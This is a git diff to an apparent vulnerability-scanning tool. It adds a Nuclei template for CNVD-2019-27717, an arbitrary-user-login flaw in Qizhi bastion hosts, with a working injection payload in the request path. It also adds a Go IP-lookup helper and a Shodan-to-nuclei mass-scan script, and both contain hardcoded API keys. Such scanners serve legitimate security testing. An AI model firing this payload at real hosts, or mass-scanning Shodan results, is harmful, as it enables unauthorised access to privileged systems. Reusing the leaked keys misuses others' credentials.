"a/config/51pwn/yaml/\351\275\220\346\262\273\345\240\241\345\236\222\346\234\272/CNVD-2019-27717.yaml" "b/config/51pwn/yaml/\351\275\220\346\262\273\345\240\241\345\236\222\346\234\272/CNVD-2019-27717.yaml" new file mode 100755 index 000000000..84b855143 --- /dev/null +++ "b/config/51pwn/yaml/\351\275\220\346\262\273\345\240\241\345\236\222\346\234\272/CNVD-2019-27717.yaml" @@ -0,0 +1,37 @@ +id: CNVD-2019-27717 +info: + name: Qizhi Fortressaircraft Unauthorized Access + author: + - l0ne1y + tags: + - qizhi + - fortressaircraft + - unauth + description: |- + 齐治堡垒机 gui_detail_view.php 任意用户登录漏洞 + 浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司。 + + 齐治堡垒机存在任意用户登录漏洞。攻击者可利用该漏洞登录任意用户。 + reference: + - http://www.i-dock.net/wiki/webapp/%e9%bd%90%e6%b2%bb%e5%a0%a1%e5%9e%92%e6%9c%ba/%e9%bd%90%e6%b2%bb%e5%a0%a1%e5%9e%92%e6%9c%ba%20gui_detail_view.php%20%e4%bb%bb%e6%84%8f%e7%94%a8%e6%88%b7%e7%99%bb%e5%bd%95%e6%bc%8f%e6%b4%9e.html + severity: high + remediation: |- + 官方修复方案: + 1.目前厂商已发布了漏洞修复程序,请及时关注更新: + https://www.shterm.com +requests: +- matchers: + - type: word + condition: and + part: body + words: + - 错误的id + - 审计管理员 + - 事件审计 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm' + method: GET diff --git a/geCurIp_test.go b/geCurIp_test.go new file mode 100644 index 000000000..8788a5bf9 --- /dev/null +++ b/geCurIp_test.go @@ -0,0 +1,18 @@ +package main + +import ( + "github.com/hktalent/ProScan4all/lib/util" + "reflect" + "testing" +) + +func TestGetIp(t *testing.T) { + util.DoInit(nil) + t.Run("获取当前用户的ip", func(t *testing.T) { + if got := util.GetIp(); !reflect.DeepEqual(got, "") { + t.Errorf("GetIp() = %v, want %v", got, "") + } + }) + util.Wg.Wait() + util.CloseAll() +} diff --git a/lib/util/geCurIp.go b/lib/util/geCurIp.go new file mode 100644 index 000000000..42a2f88c5 --- /dev/null +++ b/lib/util/geCurIp.go @@ -0,0 +1,38 @@ +package util + +import ( + "io/ioutil" + "log" + "net/http" + "net/url" + "strings" +) + +func GetIp() map[string]interface{} { + szUrl := "https://apis.map.qq.com/ws/location/v1/ip" + c := GetClient(szUrl) + c.UseHttp2 = false + var m1 map[string]interface{} + c.DoGetWithClient4SetHd(c.GetClient(nil), szUrl, "POST", strings.NewReader("key="+url.QueryEscape("IVOBZ-QNW6P-SUKDY-LFQSE-LUFCJ-3CFUE")+"&sig=afebe5ad5227ec75a1f3d8b97f888cda"), func(r *http.Response, err1 error, szU string) { + defer r.Body.Close() + if data, err := ioutil.ReadAll(r.Body); nil == err { + + if nil == json.Unmarshal(data, &m1) { + log.Printf("%+v", m1) + } + } + }, func() map[string]string { + return map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "*/*"} + }, false) + //if r, err := DoPost(szUrl, map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "*/*"}, strings.NewReader("key="+url.QueryEscape("IVOBZ-QNW6P-SUKDY-LFQSE-LUFCJ-3CFUE")+"&sig=afebe5ad5227ec75a1f3d8b97f888cda")); nil == err && r != nil { + // defer r.Body.Close() + // if data, err := ioutil.ReadAll(r.Body); nil == err { + // var m1 map[string]interface{} + // if nil == json.Unmarshal(data, &m1) { + // log.Printf("%+v", m1) + // return m1 + // } + // } + //} + return m1 +} diff --git a/pkg/xcmd/allCmdTools.go b/pkg/xcmd/allCmdTools.go index e38813347..d6983f148 100644 --- a/pkg/xcmd/allCmdTools.go +++ b/pkg/xcmd/allCmdTools.go @@ -73,10 +73,13 @@ func DoDnsx(s string) string { return DoTargetHost(s, "dnsx") } +// tlsx -u www.sina.com.cn -p 443 -scan-mode auto -san -ps -scan-all-ips -ip-version 4,6 -c 300 +// tools/macOS/tlsx -l xxx -p 443 -scan-mode auto -ps -scan-all-ips -ip-version 4,6 -so -tls-version -cipher -hash sha1 -jarm -ja3 -wildcard-cert -probe-status -expired -self-signed -mismatched -revoked -c 300 -silent -nc -json -o xxx // -version-enum // -cipher-enum // "-san", // 只做 https +// tlsx -u www.sina.com.cn -json -silent | jq . func DoTlsx(s string) string { return DoTargetHost(s, tlsx) } diff --git a/pkg/xcmd/mdrst.go b/pkg/xcmd/mdrst.go index a8334d661..6fe48ad8c 100644 --- a/pkg/xcmd/mdrst.go +++ b/pkg/xcmd/mdrst.go @@ -17,9 +17,11 @@ func GetMore(a []string, t string, a1 []string, getId func(*map[string]interface szCmd := strings.Join(a1, " ") for _, x := range a { obj := gson.NewFrom(x) + obj.Del("timestamp") switch t { - case uncover: - obj.Del("timestamp") + //case uncover: + // + default: if m, ok := obj.Val().(map[string]interface{}); ok { m["type"] = t m["cmd"] = szCmd diff --git a/tools/doNulcie4 b/tools/doNulcie4 index c73a406e6..17011faf3 100755 --- a/tools/doNulcie4 +++ b/tools/doNulcie4 @@ -2,12 +2,12 @@ # set -x xxNm=`echo $1|base64` -wget -O 51pwn/${xxNm}.json -c 'https://api.shodan.io/shodan/host/search?key=FfH1z0IR5MiktkLbfMlQD93M3lPe32vH&page=1&query=$1' +wget -O $HOME/MyWork/mybugbounty/shodan/${xxNm}.json -c 'https://api.shodan.io/shodan/host/search?key=FfH1z0IR5MiktkLbfMlQD93M3lPe32vH&page=1&query=$1' # cat 51pwn/xx.json|jq '.matches[].ip_str'|sed 's/"//g'|xargs -I % echo "https://%:5986">>lists.txt -cat 51pwn/${xxNm}.json|jq '.matches[]|[.ip_str,.port]|@csv'|sed 's/["\\]//g'|sed 's/,/:/g'|xargs -I % echo "https://%" >>${xxNm}.txt +cat $HOME/MyWork/mybugbounty/shodan/${xxNm}.json|jq '.matches[]|[.ip_str,.port]|@csv'|sed 's/["\\]//g'|sed 's/,/:/g'|xargs -I % echo "https://%" >>$HOME/MyWork/mybugbounty/shodan/${xxNm}.txt # echo ${xxNm}.txt -cat ${xxNm}.txt|nuclei -duc -t $2 -v +cat $HOME/MyWork/mybugbounty/shodan/${xxNm}.txt|nuclei -duc -t $2 -v